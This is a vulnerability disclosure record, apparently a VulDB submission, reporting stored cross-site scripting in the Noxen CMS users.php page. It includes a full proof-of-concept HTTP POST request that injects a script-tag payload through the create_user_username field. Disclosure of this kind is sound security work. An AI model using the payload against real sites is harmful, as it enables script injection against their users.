| 제목 | NoxenCMS XSS vulnerability exists |
|---|
| 설명 | Vulnerability Title: storage XSS
Software link: https://github.com/ConsoleTVs/Noxen
Setup environment: windo10-php5.6.27
1. Vulnerability analysis
The vulnerability lies in users In PHP, when receiving the parameters input by the user, it is directly inserted into the database without judging whether the string input by the user is legal.
Then query the data from the database and display it on the page.
1. Vulnerability utilization
“><script>alert(/xss/)</script>
POC:
POST /Noxen-master/users.php HTTP/1.1
Host: x.x.x.x
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Edg/103.0.1264.71
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/Noxen-master/users.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: td_cookie=4107653369; PHPSESSID=dbs82c77msp8t6cjq2vlv4gia4
Connection: close
fakeusernameremembered=&create_user_username=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&fakepasswordremembered=&create_user_password=123456&create_user_email=123%40qq.com&create_user_type=1&create_user=
|
|---|
| 원천 | ⚠️ https://github.com/whiex/Noxen |
|---|
| 사용자 | s7eyd7 (UID 30723) |
|---|
| 제출 | 2022. 08. 22. AM 10:15 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 23. AM 10:34 (1 day later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 207000 [ConsoleTVs Noxen /Noxen-master/users.php create_user_username 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|